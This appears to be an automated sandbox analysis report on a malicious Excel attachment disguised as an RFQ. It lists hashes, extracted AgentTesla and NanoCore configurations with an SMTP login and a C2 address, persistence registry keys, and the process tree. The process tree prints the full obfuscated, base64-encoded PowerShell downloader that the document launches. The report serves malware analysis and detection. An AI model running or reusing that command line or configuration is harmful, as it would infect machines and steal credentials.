Analysis
-
max time kernel
152s -
max time network
155s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
26-09-2021 20:11
Static task
static1
Behavioral task
behavioral1
Sample
RFQ#903_260921_new_request_10012_products.xls
Resource
win7v20210408
Behavioral task
behavioral2
Sample
RFQ#903_260921_new_request_10012_products.xls
Resource
win10-en-20210920
General
-
Target
RFQ#903_260921_new_request_10012_products.xls
-
Size
38KB
-
MD5
03cf64f6dff8c1467a756d8c2e2fac16
-
SHA1
c124554906286cdaa48240a394777b1ef6c853fe
-
SHA256
17b7d30b0960240b297dc208673fd4d8e9bfe52fc68a24785b83dc4b6702dba5
-
SHA512
4d47bc2367459ad55f2c5a91733d729c045035f0d8ad3fefa7f1ba015d68da957efbafd3dbb25a3033fcb4ac539480cc1c5d8d6e4d8baefe61f68caeca25bbb9
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
smtp.privateemail.com - Port:
587 - Username:
[email protected] - Password:
office12#
Extracted
nanocore
1.2.2.0
185.140.53.52:4488
4457cc23-84d1-4515-bdf3-bc83fe8472db
-
activate_away_mode
true
- backup_connection_host
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2021-07-08T12:51:02.136438436Z
-
bypass_user_account_control
false
-
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
4488
-
default_group
EXPO
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
4457cc23-84d1-4515-bdf3-bc83fe8472db
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
185.140.53.52
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
false
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1832 1684 cmd.exe EXCEL.EXE -
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
AgentTesla Payload 3 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Roaming\ammero.exe family_agenttesla C:\Users\Admin\AppData\Roaming\ammero.exe family_agenttesla C:\Users\Admin\AppData\Roaming\ammero.exe family_agenttesla -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
expo.exeammero.exeInstallUtil.exepid process 628 expo.exe 1660 ammero.exe 1844 InstallUtil.exe -
Loads dropped DLL 3 IoCs
Processes:
ei.exeexpo.exepid process 1108 ei.exe 628 expo.exe 628 expo.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule behavioral1/memory/1108-96-0x0000000000740000-0x0000000000761000-memory.dmp agile_net -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
reg.exeInstallUtil.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\expo = "C:\\Users\\Admin\\AppData\\Roaming\\expo.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\DPI Service = "C:\\Program Files (x86)\\DPI Service\\dpisv.exe" InstallUtil.exe -
Processes:
InstallUtil.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA InstallUtil.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
expo.exedescription pid process target process PID 628 set thread context of 1844 628 expo.exe InstallUtil.exe -
Drops file in Program Files directory 2 IoCs
Processes:
InstallUtil.exedescription ioc process File created C:\Program Files (x86)\DPI Service\dpisv.exe InstallUtil.exe File opened for modification C:\Program Files (x86)\DPI Service\dpisv.exe InstallUtil.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Office loads VBA resources, possible macro or embedded object present
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Processes:
EXCEL.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE -
Processes:
expo.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C expo.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 expo.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1684 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 17 IoCs
Processes:
powershell.exeei.exeexpo.exeammero.exeInstallUtil.exepid process 2008 powershell.exe 2008 powershell.exe 1108 ei.exe 1108 ei.exe 1108 ei.exe 1108 ei.exe 1108 ei.exe 628 expo.exe 628 expo.exe 1660 ammero.exe 1660 ammero.exe 1844 InstallUtil.exe 1844 InstallUtil.exe 1844 InstallUtil.exe 1844 InstallUtil.exe 1844 InstallUtil.exe 1844 InstallUtil.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
InstallUtil.exepid process 1844 InstallUtil.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exeei.exeexpo.exeammero.exeInstallUtil.exedescription pid process Token: SeDebugPrivilege 2008 powershell.exe Token: SeDebugPrivilege 1108 ei.exe Token: SeDebugPrivilege 628 expo.exe Token: SeDebugPrivilege 1660 ammero.exe Token: SeDebugPrivilege 1844 InstallUtil.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 1684 EXCEL.EXE 1684 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
EXCEL.EXEpid process 1684 EXCEL.EXE 1684 EXCEL.EXE 1684 EXCEL.EXE -
Suspicious use of WriteProcessMemory 48 IoCs
Processes:
EXCEL.EXEcmd.exepowershell.exeei.execmd.exeexpo.exeInstallUtil.exedescription pid process target process PID 1684 wrote to memory of 1832 1684 EXCEL.EXE cmd.exe PID 1684 wrote to memory of 1832 1684 EXCEL.EXE cmd.exe PID 1684 wrote to memory of 1832 1684 EXCEL.EXE cmd.exe PID 1684 wrote to memory of 1832 1684 EXCEL.EXE cmd.exe PID 1832 wrote to memory of 2008 1832 cmd.exe powershell.exe PID 1832 wrote to memory of 2008 1832 cmd.exe powershell.exe PID 1832 wrote to memory of 2008 1832 cmd.exe powershell.exe PID 1832 wrote to memory of 2008 1832 cmd.exe powershell.exe PID 2008 wrote to memory of 1108 2008 powershell.exe ei.exe PID 2008 wrote to memory of 1108 2008 powershell.exe ei.exe PID 2008 wrote to memory of 1108 2008 powershell.exe ei.exe PID 2008 wrote to memory of 1108 2008 powershell.exe ei.exe PID 1108 wrote to memory of 1612 1108 ei.exe cmd.exe PID 1108 wrote to memory of 1612 1108 ei.exe cmd.exe PID 1108 wrote to memory of 1612 1108 ei.exe cmd.exe PID 1108 wrote to memory of 1612 1108 ei.exe cmd.exe PID 1612 wrote to memory of 1976 1612 cmd.exe reg.exe PID 1612 wrote to memory of 1976 1612 cmd.exe reg.exe PID 1612 wrote to memory of 1976 1612 cmd.exe reg.exe PID 1612 wrote to memory of 1976 1612 cmd.exe reg.exe PID 1108 wrote to memory of 628 1108 ei.exe expo.exe PID 1108 wrote to memory of 628 1108 ei.exe expo.exe PID 1108 wrote to memory of 628 1108 ei.exe expo.exe PID 1108 wrote to memory of 628 1108 ei.exe expo.exe PID 628 wrote to memory of 1660 628 expo.exe ammero.exe PID 628 wrote to memory of 1660 628 expo.exe ammero.exe PID 628 wrote to memory of 1660 628 expo.exe ammero.exe PID 628 wrote to memory of 1660 628 expo.exe ammero.exe PID 628 wrote to memory of 1844 628 expo.exe InstallUtil.exe PID 628 wrote to memory of 1844 628 expo.exe InstallUtil.exe PID 628 wrote to memory of 1844 628 expo.exe InstallUtil.exe PID 628 wrote to memory of 1844 628 expo.exe InstallUtil.exe PID 628 wrote to memory of 1844 628 expo.exe InstallUtil.exe PID 628 wrote to memory of 1844 628 expo.exe InstallUtil.exe PID 628 wrote to memory of 1844 628 expo.exe InstallUtil.exe PID 628 wrote to memory of 1844 628 expo.exe InstallUtil.exe PID 628 wrote to memory of 1844 628 expo.exe InstallUtil.exe PID 628 wrote to memory of 1844 628 expo.exe InstallUtil.exe PID 628 wrote to memory of 1844 628 expo.exe InstallUtil.exe PID 628 wrote to memory of 1844 628 expo.exe InstallUtil.exe PID 1844 wrote to memory of 432 1844 InstallUtil.exe schtasks.exe PID 1844 wrote to memory of 432 1844 InstallUtil.exe schtasks.exe PID 1844 wrote to memory of 432 1844 InstallUtil.exe schtasks.exe PID 1844 wrote to memory of 432 1844 InstallUtil.exe schtasks.exe PID 1844 wrote to memory of 1788 1844 InstallUtil.exe schtasks.exe PID 1844 wrote to memory of 1788 1844 InstallUtil.exe schtasks.exe PID 1844 wrote to memory of 1788 1844 InstallUtil.exe schtasks.exe PID 1844 wrote to memory of 1788 1844 InstallUtil.exe schtasks.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\RFQ#903_260921_new_request_10012_products.xls1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c Po^W^ERS^he^LL -E WwBzAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBlAE4AQwBPAEQAaQBuAGcAXQA6ADoAdQBOAGkAQwBPAEQARQAuAGcAZQBUAFMAVAByAEkATgBHACgAWwBzAHkAUwBUAGUAbQAuAGMAbwBOAHYARQBSAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBFADYANABzAHQAUgBpAE4AZwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEcAcwBBAGIAQQBCAHkAQQBHADgAQQBjAGcAQgBwAEEARwBNAEEAWQBnAEIAcgBBAEgAWQBBAFoAZwBCAGgAQQBHAFkAQQBiAEEAQgBoAEEARwA0AEEAZABBAEIAdQBBAEcAbwBBAFoAdwBBAGcAQQBDAGcAQQBJAEEAQQBrAEEASABNAEEAYQB3AEIAMgBBAEcARQBBAGEAUQBCAG0AQQBHADAAQQBlAEEAQgA1AEEASABjAEEAWQB3AEIAMQBBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBhAEEAQgByAEEARwBVAEEAYgB3AEIAdwBBAEgAbwBBAGIAQQBCADAAQQBIAFUAQQBiAHcAQgBpAEEASABBAEEAYQBnAEEAZwBBAEMAawBBAEQAUQBBAEsAQQBIAHMAQQBJAEEAQgBKAEEARQAwAEEAVQBBAEIAUABBAEYASQBBAFYAQQBBAHQAQQBFADAAQQBiAHcAQgBrAEEASABVAEEAVABBAEIARgBBAEMAQQBBAFEAZwBCAEoAQQBIAFEAQQBVAHcAQgBVAEEARgBJAEEAUQBRAEIATwBBAEgATQBBAFoAZwBCAGwAQQBGAEkAQQBPAHcAQQBOAEEAQQBvAEEAVQB3AEIAMABBAEUARQBBAGMAZwBCAFUAQQBDADAAQQBRAGcAQgBKAEEARgBRAEEAYwB3AEIAMABBAEgASQBBAFEAUQBCAHUAQQBGAE0AQQBSAGcAQgBGAEEASABJAEEASQBBAEEAdABBAEgATQBBAGIAdwBCAFYAQQBIAEkAQQBZAHcAQgBsAEEAQwBBAEEASgBBAEIAegBBAEcAcwBBAGQAZwBCAGgAQQBHAGsAQQBaAGcAQgB0AEEASABnAEEAZQBRAEIAMwBBAEcATQBBAGQAUQBBAGcAQQBDADAAQQBSAEEAQgBsAEEARgBNAEEAVgBBAEIAcABBAEUANABBAFEAUQBCAFUAQQBFAGsAQQBiAHcAQgBPAEEAQwBBAEEASgBBAEIAbwBBAEcAcwBBAFoAUQBCAHYAQQBIAEEAQQBlAGcAQgBzAEEASABRAEEAZABRAEIAdgBBAEcASQBBAGMAQQBCAHEAQQBEAHMAQQBJAEEAQQBtAEEAQwBBAEEASgBBAEIAbwBBAEcAcwBBAFoAUQBCAHYAQQBIAEEAQQBlAGcAQgBzAEEASABRAEEAZABRAEIAdgBBAEcASQBBAGMAQQBCAHEAQQBEAHMAQQBJAEEAQgA5AEEASABRAEEAYwBnAEIANQBBAEgAcwBBAEoAQQBCADIAQQBIAEUAQQBlAEEAQgAwAEEARwBRAEEAYQBBAEIAbQBBAEcATQBBAFoAQQBCAG8AQQBHAFUAQQBZAGcAQgAxAEEARwBRAEEAWgB3AEEAOQBBAEMAUQBBAFoAUQBCAE8AQQBGAFkAQQBPAGcAQgAwAEEARQBVAEEAYgBRAEIAUQBBAEMAcwBBAEoAdwBCAGMAQQBHAFUAQQBhAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAE8AdwBBAE4AQQBBAG8AQQBhAHcAQgBzAEEASABJAEEAYgB3AEIAeQBBAEcAawBBAFkAdwBCAGkAQQBHAHMAQQBkAGcAQgBtAEEARwBFAEEAWgBnAEIAcwBBAEcARQBBAGIAZwBCADAAQQBHADQAQQBhAGcAQgBuAEEAQwBBAEEASgB3AEIAbwBBAEgAUQBBAGQAQQBCAHcAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAYgBnAEIAcgBBAEcARQBBAEwAUQBCADAAQQBHAFUAQQBhAHcAQQB1AEEARwBNAEEAYgB3AEIAdABBAEMANABBAGQAQQBCAHkAQQBDADgAQQBRAFEAQgBWAEEARQBjAEEATAB3AEIAMwBBAEcAVQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAawBBAEgAWQBBAGMAUQBCADQAQQBIAFEAQQBaAEEAQgBvAEEARwBZAEEAWQB3AEIAawBBAEcAZwBBAFoAUQBCAGkAQQBIAFUAQQBaAEEAQgBuAEEARABzAEEARABRAEEASwBBAEcAcwBBAGIAQQBCAHkAQQBHADgAQQBjAGcAQgBwAEEARwBNAEEAWQBnAEIAcgBBAEgAWQBBAFoAZwBCAGgAQQBHAFkAQQBiAEEAQgBoAEEARwA0AEEAZABBAEIAdQBBAEcAbwBBAFoAdwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGgAQQBHADQAQQBhAHcAQgBoAEEAQwAwAEEAZABBAEIAbABBAEcAcwBBAEwAZwBCAGoAQQBHADgAQQBiAFEAQQB1AEEASABRAEEAYwBnAEEAdgBBAEUARQBBAFYAUQBCAEgAQQBDADgAQQBkAHcAQgBsAEEARwBRAEEATABnAEIAbABBAEgAZwBBAFoAUQBBAG4AQQBDAEEAQQBKAEEAQgAyAEEASABFAEEAZQBBAEIAMABBAEcAUQBBAGEAQQBCAG0AQQBHAE0AQQBaAEEAQgBvAEEARwBVAEEAWQBnAEIAMQBBAEcAUQBBAFoAdwBBADcAQQBBADAAQQBDAGcAQgByAEEARwB3AEEAYwBnAEIAdgBBAEgASQBBAGEAUQBCAGoAQQBHAEkAQQBhAHcAQgAyAEEARwBZAEEAWQBRAEIAbQBBAEcAdwBBAFkAUQBCAHUAQQBIAFEAQQBiAGcAQgBxAEEARwBjAEEASQBBAEEAbgBBAEcAZwBBAGQAQQBCADAAQQBIAEEAQQBPAGcAQQB2AEEAQwA4AEEAWQBRAEIAdQBBAEcAcwBBAFkAUQBBAHQAQQBIAFEAQQBaAFEAQgByAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEwAZwBCADAAQQBIAEkAQQBMAHcAQgBCAEEARgBVAEEAUgB3AEEAdgBBAEgAYwBBAFoAUQBCAGsAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEAZwBBAEMAUQBBAGQAZwBCAHgAQQBIAGcAQQBkAEEAQgBrAEEARwBnAEEAWgBnAEIAagBBAEcAUQBBAGEAQQBCAGwAQQBHAEkAQQBkAFEAQgBrAEEARwBjAEEATwB3AEEATgBBAEEAbwBBAGYAUQBCAGoAQQBHAEUAQQBkAEEAQgBqAEEARwBnAEEAZQB3AEIAOQBBAEEAPQA9ACIAKQApAHwASQBFAFgA2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoWERSheLL -E WwBzAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBlAE4AQwBPAEQAaQBuAGcAXQA6ADoAdQBOAGkAQwBPAEQARQAuAGcAZQBUAFMAVAByAEkATgBHACgAWwBzAHkAUwBUAGUAbQAuAGMAbwBOAHYARQBSAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBFADYANABzAHQAUgBpAE4AZwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEcAcwBBAGIAQQBCAHkAQQBHADgAQQBjAGcAQgBwAEEARwBNAEEAWQBnAEIAcgBBAEgAWQBBAFoAZwBCAGgAQQBHAFkAQQBiAEEAQgBoAEEARwA0AEEAZABBAEIAdQBBAEcAbwBBAFoAdwBBAGcAQQBDAGcAQQBJAEEAQQBrAEEASABNAEEAYQB3AEIAMgBBAEcARQBBAGEAUQBCAG0AQQBHADAAQQBlAEEAQgA1AEEASABjAEEAWQB3AEIAMQBBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBhAEEAQgByAEEARwBVAEEAYgB3AEIAdwBBAEgAbwBBAGIAQQBCADAAQQBIAFUAQQBiAHcAQgBpAEEASABBAEEAYQBnAEEAZwBBAEMAawBBAEQAUQBBAEsAQQBIAHMAQQBJAEEAQgBKAEEARQAwAEEAVQBBAEIAUABBAEYASQBBAFYAQQBBAHQAQQBFADAAQQBiAHcAQgBrAEEASABVAEEAVABBAEIARgBBAEMAQQBBAFEAZwBCAEoAQQBIAFEAQQBVAHcAQgBVAEEARgBJAEEAUQBRAEIATwBBAEgATQBBAFoAZwBCAGwAQQBGAEkAQQBPAHcAQQBOAEEAQQBvAEEAVQB3AEIAMABBAEUARQBBAGMAZwBCAFUAQQBDADAAQQBRAGcAQgBKAEEARgBRAEEAYwB3AEIAMABBAEgASQBBAFEAUQBCAHUAQQBGAE0AQQBSAGcAQgBGAEEASABJAEEASQBBAEEAdABBAEgATQBBAGIAdwBCAFYAQQBIAEkAQQBZAHcAQgBsAEEAQwBBAEEASgBBAEIAegBBAEcAcwBBAGQAZwBCAGgAQQBHAGsAQQBaAGcAQgB0AEEASABnAEEAZQBRAEIAMwBBAEcATQBBAGQAUQBBAGcAQQBDADAAQQBSAEEAQgBsAEEARgBNAEEAVgBBAEIAcABBAEUANABBAFEAUQBCAFUAQQBFAGsAQQBiAHcAQgBPAEEAQwBBAEEASgBBAEIAbwBBAEcAcwBBAFoAUQBCAHYAQQBIAEEAQQBlAGcAQgBzAEEASABRAEEAZABRAEIAdgBBAEcASQBBAGMAQQBCAHEAQQBEAHMAQQBJAEEAQQBtAEEAQwBBAEEASgBBAEIAbwBBAEcAcwBBAFoAUQBCAHYAQQBIAEEAQQBlAGcAQgBzAEEASABRAEEAZABRAEIAdgBBAEcASQBBAGMAQQBCAHEAQQBEAHMAQQBJAEEAQgA5AEEASABRAEEAYwBnAEIANQBBAEgAcwBBAEoAQQBCADIAQQBIAEUAQQBlAEEAQgAwAEEARwBRAEEAYQBBAEIAbQBBAEcATQBBAFoAQQBCAG8AQQBHAFUAQQBZAGcAQgAxAEEARwBRAEEAWgB3AEEAOQBBAEMAUQBBAFoAUQBCAE